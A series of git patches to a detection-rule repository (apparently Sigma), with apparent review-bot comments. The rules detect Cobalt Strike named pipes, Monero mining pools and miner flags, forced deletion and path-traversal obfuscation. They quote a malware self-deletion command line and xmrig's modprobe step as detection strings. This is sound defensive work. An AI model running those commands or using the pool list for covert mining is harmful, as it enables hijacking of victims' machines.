@@ -10,7 +10,7 @@ author: Florian Roth logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for PipeEvents in Sysmon config' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' detection: selection: PipeName|contains: diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml index 80ada94e..67e1f7a9 100644 --- a/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml 
@@ -16,7 +16,7 @@ tags: logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can always use Cobalt Strike, but also you can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' detection: selection_MSSE: PipeName|contains|all: diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml index affe16b4..ad52ba0b 100644 --- a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml 
@@ -15,7 +15,7 @@ tags: logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can always use Cobalt Strike, but also you can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' detection: selection: - PipeName|re: '\\\\mojo\.5688\.8052\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' diff --git a/rules/windows/pipe_created/sysmon_mal_namedpipes.yml b/rules/windows/pipe_created/sysmon_mal_namedpipes.yml index f8fbc077..835c6fde 100644 --- a/rules/windows/pipe_created/sysmon_mal_namedpipes.yml +++ b/rules/windows/pipe_created/sysmon_mal_namedpipes.yml 
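Review bot: The new `definition` string in this hunk repeats the sentence `You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular` twice, with the period missing after the first `sysmon-modular`; the same duplicated text appears in the `sysmon_susp_cobaltstrike_pipe_patterns.yml` hunk below. Removing the second copy makes both strings match the other eight rule files touched by this commit. Keeping the wording byte-identical across all ten files also keeps a later update to a single search-and-replace.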
@@ -9,7 +9,7 @@ author: Florian Roth, blueteam0ps logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for PipeEvents in Sysmon config' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' detection: selection: PipeName: diff --git a/rules/windows/pipe_created/sysmon_psexec_pipes_artifacts.yml b/rules/windows/pipe_created/sysmon_psexec_pipes_artifacts.yml index 258a0a1d..fa35acce 100644 --- a/rules/windows/pipe_created/sysmon_psexec_pipes_artifacts.yml +++ b/rules/windows/pipe_created/sysmon_psexec_pipes_artifacts.yml @@ -12,7 +12,7 @@ tags: logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for PipeEvents in Symson config' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' detection: selection: PipeName|startswith: 
diff --git a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml index 79ea5a81..5c8dfda6 100644 --- a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml +++ b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml @@ -15,7 +15,7 @@ tags: logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can always use Cobalt Strike, but also you can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' detection: selection_malleable_profiles: - PipeName|startswith: diff --git a/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml b/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml index dfb28c36..87933c08 100644 --- a/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml +++ b/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml 
@@ -9,7 +9,7 @@ author: Florian Roth logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' detection: selection: Image|endswith: '\scrcons.exe' From 4bcde17e00341068cf34908bca2985e3f010ef4d Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 26 Oct 2021 06:49:05 +0200 Subject: [PATCH 1329/1367] Fix title --- ..._web_request.yml => process_creation_susp_web_request_cmd.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/windows/process_creation/{process_creation_powershell_web_request.yml => process_creation_susp_web_request_cmd.yml} (100%) diff --git a/rules/windows/process_creation/process_creation_powershell_web_request.yml b/rules/windows/process_creation/process_creation_susp_web_request_cmd.yml similarity index 100% rename from rules/windows/process_creation/process_creation_powershell_web_request.yml rename to rules/windows/process_creation/process_creation_susp_web_request_cmd.yml From 7c9da11fa7f127ecc216e3c4db7f101439412fbf Mon Sep 17 00:00:00 2001 
From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 26 Oct 2021 06:49:44 +0200 Subject: [PATCH 1330/1367] fix title --- .../process_creation_susp_web_request_cmd.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/process_creation_susp_web_request_cmd.yml b/rules/windows/process_creation/process_creation_susp_web_request_cmd.yml index 8e5dc23e..5fae2a85 100644 --- a/rules/windows/process_creation/process_creation_susp_web_request_cmd.yml +++ b/rules/windows/process_creation/process_creation_susp_web_request_cmd.yml @@ -1,7 +1,7 @@ -title: Windows PowerShell Web Request +title: Windows Suspicious Use Of Web Request in CommandLine id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d status: experimental -description: Detects the use of various web request methods (including aliases) via Windows PowerShell command +description: Detects the use of various web request with commandline tools or Windows PowerShell command,methods (including aliases) references: - https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/ - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell From 0b46180cd285aeb5e040190e97f5cd31d59b11e5 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 26 Oct 2021 08:51:54 +0200 Subject: [PATCH 1331/1367] fix: moved back connect bash to correct folder --- .../lnx_back_connect_shell_dev.yml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/linux/{process_creation => network_connection}/lnx_back_connect_shell_dev.yml (100%) diff --git a/rules/linux/process_creation/lnx_back_connect_shell_dev.yml b/rules/linux/network_connection/lnx_back_connect_shell_dev.yml similarity index 100% rename from rules/linux/process_creation/lnx_back_connect_shell_dev.yml rename to rules/linux/network_connection/lnx_back_connect_shell_dev.yml From ab499c9c21697ffd2c32a12881afd6200ab1ca02 Mon Sep 17 00:00:00 2001 
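Review bot: The new `description` line, `Detects the use of various web request with commandline tools or Windows PowerShell command,methods (including aliases)`, has lost the noun that `various web request` qualifies and has no space after the comma. Suggested: `description: Detects the use of various web request methods (including aliases) via command-line tools or Windows PowerShell`. The retitled `Windows Suspicious Use Of Web Request in CommandLine` reads fine as is.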
From: Florian Roth Date: Tue, 26 Oct 2021 08:52:07 +0200 Subject: [PATCH 1332/1367] rules: crypto coin mining --- .../lnx_crypto_mining_indicators.yml | 40 +++++++++++++++++++ .../process_creation/lnx_crypto_mining.yml | 36 +++++++++++++++++ .../win_net_crypto_mining.yml | 40 +++++++++++++++++++ .../win_crypto_mining_monero.yml | 36 +++++++++++++++++ 4 files changed, 152 insertions(+) create mode 100644 rules/linux/network_connection/lnx_crypto_mining_indicators.yml create mode 100644 rules/linux/process_creation/lnx_crypto_mining.yml create mode 100644 rules/windows/network_connection/win_net_crypto_mining.yml create mode 100644 rules/windows/process_creation/win_crypto_mining_monero.yml diff --git a/rules/linux/network_connection/lnx_crypto_mining_indicators.yml b/rules/linux/network_connection/lnx_crypto_mining_indicators.yml new file mode 100644 index 00000000..3ae3b1a7 --- /dev/null +++ b/rules/linux/network_connection/lnx_crypto_mining_indicators.yml @@ -0,0 +1,40 @@ +title: Linux Crypto Mining Pool Connections +id: a46c93b7-55ed-4d27-a41b-c259456c4746 +status: stable +description: Detects process connections to a Monero crypto mining pool +references: + - https://www.poolwatch.io/coin/monero +date: 2021/10/26 +author: Florian Roth +logsource: + product: linux + category: network_connection +detection: + selection: + DestinationHostname: + - 'pool.minexmr.com' + - 'fr.minexmr.com' + - 'de.minexmr.com' + - 'sg.minexmr.com' + - 'ca.minexmr.com' + - 'us-west.minexmr.com' + - 'pool.supportxmr.com' + - 'mine.c3pool.com' + - 'xmr-eu1.nanopool.org' + - 'xmr-eu2.nanopool.org' + - 'xmr-us-east1.nanopool.org' + - 'xmr-us-west1.nanopool.org' + - 'xmr-asia1.nanopool.org' + - 'xmr-jp1.nanopool.org' + - 'xmr-au1.nanopool.org' + - 'xmr.2miners.com' + - 'xmr.hashcity.org' + - 'xmr.f2pool.com' + - 'xmrpool.eu' + - 'pool.hashvault.pro' + - 'moneroocean.stream' + - 'monerocean.stream' + condition: selection +falsepositives: + - Legitimate use of crypto miners +level: high 
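Review bot: `status: stable` on a rule created in this commit (`date: 2021/10/26`) skips the `experimental` stage that the sibling `lnx_crypto_mining.yml` in the next hunk uses; `win_net_crypto_mining.yml` and `win_crypto_mining_monero.yml` further down are also `stable`, and the four new rules should agree. None of the four carries a `tags` section, unlike every other rule in this patch series; `tags:` with `- attack.impact` and `- attack.t1496` (Resource Hijacking) would be the usual mapping. The hostname list contains both `moneroocean.stream` and `monerocean.stream`; if the second is a deliberate look-alike domain rather than a typo of the first, a one-line comment saying so would stop a later cleanup from dropping it. The same list is duplicated verbatim in the Windows rule, so any future pool addition has to be made in both files.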
diff --git a/rules/linux/process_creation/lnx_crypto_mining.yml b/rules/linux/process_creation/lnx_crypto_mining.yml new file mode 100644 index 00000000..5ff3b1e4 --- /dev/null +++ b/rules/linux/process_creation/lnx_crypto_mining.yml @@ -0,0 +1,36 @@ +title: Linux Crypto Mining Indicators +id: 9069ea3c-b213-4c52-be13-86506a227ab1 +status: experimental +description: Detects command line parameters or strings often used by crypto miners +references: + - https://www.poolwatch.io/coin/monero +date: 2021/10/26 +author: Florian Roth +logsource: + product: linux + category: process_creation +detection: + selection: + CommandLine|contains: + - ' --cpu-priority=' + - '--donate-level=0' + - ' -o pool.' + - ' --nicehash' + - ' --algo=rx/0 ' + - 'stratum+tcp://' + - 'stratum+udp://' + # base64 encoded: --donate-level= + - 'LS1kb25hdGUtbGV2ZWw9' + - '0tZG9uYXRlLWxldmVsP' + - 'tLWRvbmF0ZS1sZXZlbD' + # base64 encoded: stratum+tcp:// and stratum+udp:// + - 'c3RyYXR1bSt0Y3A6Ly' + - 'N0cmF0dW0rdGNwOi8v' + - 'zdHJhdHVtK3RjcDovL' + - 'c3RyYXR1bSt1ZHA6Ly' + - 'N0cmF0dW0rdWRwOi8v' + - 'zdHJhdHVtK3VkcDovL' + condition: selection +falsepositives: + - Legitimate use of crypto miners +level: high diff --git a/rules/windows/network_connection/win_net_crypto_mining.yml b/rules/windows/network_connection/win_net_crypto_mining.yml new file mode 100644 index 00000000..3ec3eb2f --- /dev/null +++ b/rules/windows/network_connection/win_net_crypto_mining.yml 
@@ -0,0 +1,40 @@ +title: Windows Crypto Mining Pool Connections +id: fa5b1358-b040-4403-9868-15f7d9ab6329 +status: stable +description: Detects process connections to a Monero crypto mining pool +references: + - https://www.poolwatch.io/coin/monero +date: 2021/10/26 +author: Florian Roth +logsource: + category: network_connection + product: windows +detection: + selection: + DestinationHostname: + - 'pool.minexmr.com' + - 'fr.minexmr.com' + - 'de.minexmr.com' + - 'sg.minexmr.com' + - 'ca.minexmr.com' + - 'us-west.minexmr.com' + - 'pool.supportxmr.com' + - 'mine.c3pool.com' + - 'xmr-eu1.nanopool.org' + - 'xmr-eu2.nanopool.org' + - 'xmr-us-east1.nanopool.org' + - 'xmr-us-west1.nanopool.org' + - 'xmr-asia1.nanopool.org' + - 'xmr-jp1.nanopool.org' + - 'xmr-au1.nanopool.org' + - 'xmr.2miners.com' + - 'xmr.hashcity.org' + - 'xmr.f2pool.com' + - 'xmrpool.eu' + - 'pool.hashvault.pro' + - 'moneroocean.stream' + - 'monerocean.stream' + condition: selection +falsepositives: + - Legitimate use of crypto miners +level: high diff --git a/rules/windows/process_creation/win_crypto_mining_monero.yml b/rules/windows/process_creation/win_crypto_mining_monero.yml new file mode 100644 index 00000000..d4bade38 --- /dev/null +++ b/rules/windows/process_creation/win_crypto_mining_monero.yml 
@@ -0,0 +1,36 @@ +title: Windows Crypto Mining Indicators +id: 66c3b204-9f88-4d0a-a7f7-8a57d521ca55 +description: Detects command line parameters or strings often used by crypto miners +status: stable +references: + - https://www.poolwatch.io/coin/monero +author: Florian Roth +date: 2021/10/26 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains: + - ' --cpu-priority=' + - '--donate-level=0' + - ' -o pool.' + - ' --nicehash' + - ' --algo=rx/0 ' + - 'stratum+tcp://' + - 'stratum+udp://' + # base64 encoded: --donate-level= + - 'LS1kb25hdGUtbGV2ZWw9' + - '0tZG9uYXRlLWxldmVsP' + - 'tLWRvbmF0ZS1sZXZlbD' + # base64 encoded: stratum+tcp:// and stratum+udp:// + - 'c3RyYXR1bSt0Y3A6Ly' + - 'N0cmF0dW0rdGNwOi8v' + - 'zdHJhdHVtK3RjcDovL' + - 'c3RyYXR1bSt1ZHA6Ly' + - 'N0cmF0dW0rdWRwOi8v' + - 'zdHJhdHVtK3VkcDovL' + condition: selection +falsepositives: + - Legitimate use of crypto miners +level: high From ba4bb061c7a280881ca614c7b9fc0fc096c2eae1 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 26 Oct 2021 12:22:18 +0200 Subject: [PATCH 1333/1367] Fix test_duplicate_detections for logsource --- tests/test_rules.py | 23 +++++++++++++---------- 1 file changed, 13 insertions(+), 10 deletions(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index b31c8eab..9a598402 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py 
@@ -184,31 +184,33 @@ class TestRules(unittest.TestCase): self.assertEqual(faulty_detections, [], Fore.RED + "There are rules using '1/all of them' style conditions but only have one condition") - def test_duplicate_titles(self): + def test_duplicate_detections(self): def compare_detections(detection1:dict, detection2:dict) -> bool: - # detections not the same length can't be the same + # detections not the same count can't be the same if len(detection1) != len(detection2): - return False - + return False + for named_condition in detection1: #don't check timeframes if named_condition == "timeframe": continue - + # condition clause must be the same too if named_condition == "condition": if detection1["condition"] != detection2["condition"]: return False else: continue - + # Named condition must exist in both rule files if named_condition not in detection2: return False - + + #can not be the same if len is not equal if len(detection1[named_condition]) != len(detection2[named_condition]): return False + for condition in detection1[named_condition]: if type(condition) != str: @@ -216,10 +218,9 @@ class TestRules(unittest.TestCase): if condition not in detection2[named_condition]: return False - + condition_value1 = detection1[named_condition][condition] condition_value2 = detection2[named_condition][condition] - if condition_value1 != condition_value2: return False @@ -229,9 +230,11 @@ class TestRules(unittest.TestCase): files_and_their_detections = {} for file in self.yield_next_rule_file_path(self.path_to_rules): + print(file) detection = self.get_rule_part(file_path = file, part_name = "detection") logsource = self.get_rule_part(file_path = file, part_name = "logsource") - detection.update(logsource) + detection["logsource"] = {} + detection["logsource"].update(logsource) yaml = self.get_rule_yaml(file_path = file) is_multipart_yaml_file = len(yaml) != 1 From c0a3f7afdd1d94876696cafc3832dc3be4f2fd4e Mon Sep 17 00:00:00 2001 
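Review bot: In the third hunk, `detection["logsource"] = {}` followed by `detection["logsource"].update(logsource)` can be the single line `detection["logsource"] = dict(logsource)`, which also makes the copy explicit; nesting under a key fixes the earlier `detection.update(logsource)`, which merged logsource keys into the detection dict itself. Using the literal key `logsource` means a rule whose detection section defines a named selection called `logsource` would be silently overwritten; a guard such as `assert "logsource" not in detection, file` would surface that (I have not checked whether any rule uses that name). `compare_detections` begins in the first hunk and continues past the second, so the `type(condition) != str` check on the last visible line — better written `not isinstance(condition, str)` — is cut off here.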
From: frack113 Date: Tue, 26 Oct 2021 12:25:26 +0200 Subject: [PATCH 1334/1367] Remove my print debug --- tests/test_rules.py | 1 - 1 file changed, 1 deletion(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index 9a598402..58c57fe0 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -230,7 +230,6 @@ class TestRules(unittest.TestCase): files_and_their_detections = {} for file in self.yield_next_rule_file_path(self.path_to_rules): - print(file) detection = self.get_rule_part(file_path = file, part_name = "detection") logsource = self.get_rule_part(file_path = file, part_name = "logsource") detection["logsource"] = {} From 79399db2b833d160453ce53419b8011ac3993382 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 26 Oct 2021 13:17:56 +0200 Subject: [PATCH 1335/1367] add process_creation_susp_del --- .../process_creation_susp_del.yml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 rules/windows/process_creation/process_creation_susp_del.yml diff --git a/rules/windows/process_creation/process_creation_susp_del.yml b/rules/windows/process_creation/process_creation_susp_del.yml new file mode 100644 index 00000000..61f61564 --- /dev/null +++ b/rules/windows/process_creation/process_creation_susp_del.yml 
@@ -0,0 +1,31 @@ +title: Suspicious Del in CommandLine +id: 204b17ae-4007-471b-917b-b917b315c5db +status: experimental +description: suspicious command line to remove exe or dll +author: frack113 +date: 2021/10/26 +references: + - https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D +tags: + - attack.defense_evasion + - attack.t1070.004 +logsource: + category: process_creation + product: windows +detection: + susp_del_exe: + CommandLine|contains|all: + - 'del ' + - '/f ' + - '/q ' + - '.exe' + susp_del_dll: + CommandLine|contains|all: + - 'del ' + - 'C:\ProgramData\' + - '.dll' + condition: susp_del_exe or susp_del_dll +#cmd.exe (PID: 1044 cmdline: 'C:\Windows\System32\cmd.exe' /c taskkill /im A8D4.exe /f & timeout /t 6 & del /f /q 'C:\Users\user~1\AppData\Local\Temp\A8D4.exe' & del C:\ProgramData\*.dll & exit +falsepositives: + - unknown +level: medium \ No newline at end of file From 1983cba1f33b5e9ecbaee6735629f1de160df425 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 26 Oct 2021 13:24:01 +0200 Subject: [PATCH 1336/1367] refactor: xmrig sub process indicator --- rules/linux/process_creation/lnx_crypto_mining.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/rules/linux/process_creation/lnx_crypto_mining.yml b/rules/linux/process_creation/lnx_crypto_mining.yml index 5ff3b1e4..cc4e2eb2 100644 --- a/rules/linux/process_creation/lnx_crypto_mining.yml +++ b/rules/linux/process_creation/lnx_crypto_mining.yml @@ -19,6 +19,8 @@ detection: - ' --algo=rx/0 ' - 'stratum+tcp://' - 'stratum+udp://' + # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives + - 'sh -c /sbin/modprobe msr allow_writes=on' # base64 encoded: --donate-level= - 'LS1kb25hdGUtbGV2ZWw9' - '0tZG9uYXRlLWxldmVsP' From 3983baf2b02289ec5753700e66d8ae71f38dc2bf Mon Sep 17 00:00:00 2001 
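Review bot: The `#cmd.exe (PID: 1044 cmdline: ...` line placed between `condition` and `falsepositives` is the sandbox sample the rule was derived from; as a YAML comment it is invisible to sigmac and to anyone consuming the converted rule, so the provenance belongs in `description` or alongside the `references` entry rather than inside the detection block. Both selections use `contains|all`, which is unordered, so `'del '`, `'/f '`, `'/q '` and `'.exe'` may each come from different commands in a chained `&` line, and `susp_del_dll` fires on any command line mentioning `del `, `C:\ProgramData\` and `.dll` anywhere; stating the expected benign case (installer or updater cleanup steps, for example) under `falsepositives` instead of `unknown` would tell operators that tuning is anticipated. The file also lacks a trailing newline.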
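Review bot: The new indicator `'sh -c /sbin/modprobe msr allow_writes=on'` is bound to one exact launch form — via `sh -c`, with the absolute `/sbin` path and that argument order — so the same module load issued as `modprobe msr allow_writes=on` directly or through `/usr/sbin/modprobe` is not covered, while the inline comment already concedes the false-positive exposure is unknown. Utilities that read model-specific registers directly (performance or power-monitoring tools) may load the same module, so that caveat belongs in the rule's `falsepositives` section, which lies outside this hunk, rather than only in a comment the rule's consumers never see.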
From: phantinuss Date: Tue, 26 Oct 2021 16:35:06 +0200 Subject: [PATCH 1337/1367] windows commandline obfuscation --- .../win_commandline_path_obfuscation.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/windows/process_creation/win_commandline_path_obfuscation.yml diff --git a/rules/windows/process_creation/win_commandline_path_obfuscation.yml b/rules/windows/process_creation/win_commandline_path_obfuscation.yml new file mode 100644 index 00000000..70fa5a9d --- /dev/null +++ b/rules/windows/process_creation/win_commandline_path_obfuscation.yml @@ -0,0 +1,29 @@ +title: Command Line Path Obfuscation +status: experimental +id: 1327381e-6ab0-4f38-b583-4c1b8346a56b +author: Christian Burkard +date: 2021/10/26 +description: Detects the attempt to hide or obfuscate the executed command on the CommandLine using bogus path traversal +references: + - https://twitter.com/hexacorn/status/1448037865435320323 + - https://twitter.com/Gal_B1t/status/1062971006078345217 +tags: + - attack.defense_evasion + - attack.t1036 +logsource: + category: process_creation + product: windows +detection: + selection1: + Image|contains: + - '\Windows\' + CommandLine|contains: + - '\..\Windows\' + - '\..\System32\' + - '\..\..\' + selection2: + CommandLine|contains: '.exe\..\' + condition: 1 of them +falsepositives: + - Unknown +level: high From bacdf53236c81a3016b3d85c6469544e3a46a7e9 Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Tue, 26 Oct 2021 15:05:27 +0000 Subject: [PATCH 1338/1367] updating hawk backend to fix or list map missing an outer and operator --- tools/sigma/backends/hawk.py | 131 +++++++++++++++++++++++++++-------- 1 file changed, 101 insertions(+), 30 deletions(-) diff --git a/tools/sigma/backends/hawk.py b/tools/sigma/backends/hawk.py index 54603c11..5fd7a5f0 100644 --- a/tools/sigma/backends/hawk.py +++ b/tools/sigma/backends/hawk.py 
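Review bot: `selection1` pairs `Image|contains: '\Windows\'` with `CommandLine|contains: '\..\..\'`, and at `level: high` with `falsepositives: Unknown` that third pattern is the weak point: a Windows-directory binary such as cmd.exe or msiexec.exe launched with an ordinary relative path argument can produce `\..\..\` in its command line without any traversal trick, a far broader population than the `\..\Windows\` and `\..\System32\` cases the references describe. Consider dropping `'\..\..\'` from `selection1` or moving it into a separate selection at a lower level, and listing the obvious benign cases under `falsepositives` so operators know what to expect.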
@@ -126,6 +126,8 @@ class HAWKBackend(SingleTextQueryBackend): return None def generateORNode(self, node): + #retAnd = { "id" : "and", "key": "And", "children" : [ ] } + ret = { "id" : "or", "key": "Or", "children" : [ ] } generated = [ self.generateNode(val) for val in node ] filtered = [ g for g in generated if g is not None ] @@ -133,7 +135,9 @@ class HAWKBackend(SingleTextQueryBackend): if self.sort_condition_lists: filtered = sorted(filtered) ret['children'] = filtered - # return json.dumps(ret)# self.orToken.join(filtered) + + # retAnd['children'].append( ret ) + #return retAnd return ret else: return None @@ -241,8 +245,9 @@ class HAWKBackend(SingleTextQueryBackend): #print(item) nodeRet['args']['str']['value'] = self.generateValueNode(item, True) ret['children'].append( nodeRet ) + retAnd = { "id" : "and", "key": "And", "children" : [ ret ] } + return retAnd # '('+" or ".join(itemslist)+')' # return json.dumps(ret) # '('+" or ".join(itemslist)+')' - return ret # '('+" or ".join(itemslist)+')' def generateMapItemTypedNode(self, fieldname, value, notNode=False): nodeRet = {"key": "", "description": "", "class": "column", "return": "str", "args": { "comparison": { "value": "=" }, "str": { "value": "5" } } } 
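Review bot: The `@@ -126` and `@@ -133` hunks add only commented-out code (`#retAnd = { "id" : "and", ... }`, `# retAnd['children'].append( ret )`, `#return retAnd`); an alternative return shape that was tried and rejected belongs in the commit message, not in `generateORNode`, so these lines should be removed. In the `@@ -241` hunk the new `retAnd = { "id" : "and", "key": "And", "children" : [ ret ] }` wraps the Or node in a single-child And, which the commit message implies the consumer requires; a one-line comment such as `# HAWK expects an And at the top of a map-list node, even with one child` would keep the next reader from simplifying it away. With the original indentation lost it is not clear whether `retAnd`/`return retAnd` sit after the loop that appends to `ret['children']` or inside it; the enclosing function starts outside the hunk.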
@@ -292,28 +297,72 @@ class HAWKBackend(SingleTextQueryBackend): def generateAggregation(self, agg, timeframe='00'): if agg == None: - return "" + return None + #print(agg.aggfunc) + #print(type(agg.aggfunc)) + #print(agg.aggfunc_notrans) + if not agg.aggfunc_notrans.lower() in ("count", "sum"): + raise NotImplementedError("This aggregation operator '%s' has not been implemented" % agg.aggfunc_notrans) + if agg.aggfunc == sigma.parser.condition.SigmaAggregationParser.AGGFUNC_NEAR: - raise NotImplementedError("The 'near' aggregation operator is not yet implemented for this backend") + return None + if agg.groupfield == None: - s = "SELECT %s(%s) as agg_val from %s where" % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) - s2 = " group by %s having agg_val %s %s" % (self.cleanKey(agg.aggfield), agg.cond_op, agg.condition) - raise NotImplementedError("The 'agg val' aggregation operator is not yet implemented for this backend: %s %s" % (s, s2)) - """ - elif agg.groupfield != None and timeframe == '00': - self.prefixAgg = " SELECT %s(%s) as agg_val from %s where " % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) - self.suffixAgg = " group by %s having agg_val %s %s" % (self.cleanKey(agg.groupfield), agg.cond_op, agg.condition) - return self.prefixAgg, self.suffixAgg + agg.groupfield = "priority" + + if agg.groupfield != None and timeframe == '00': + self.prefixAgg = " SELECT %s(%s) as agg_val from %s where " % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) + self.suffixAgg = " group by %s having agg_val %s %s" % (self.cleanKey(agg.groupfield), agg.cond_op, agg.condition) + #print("Group field and timeframe is 00") + min_count = 60 + nodeRet = {"key": "atomic_counter", "description": self.cleanKey(agg.groupfield) + " %s aggregation stream counter" % agg.aggfunc_notrans, "class": "function", "return": "int", + "inputs": { + "columns" : { "order" : "0", "source" : "columns", "type" : "array", "objectKey" : 
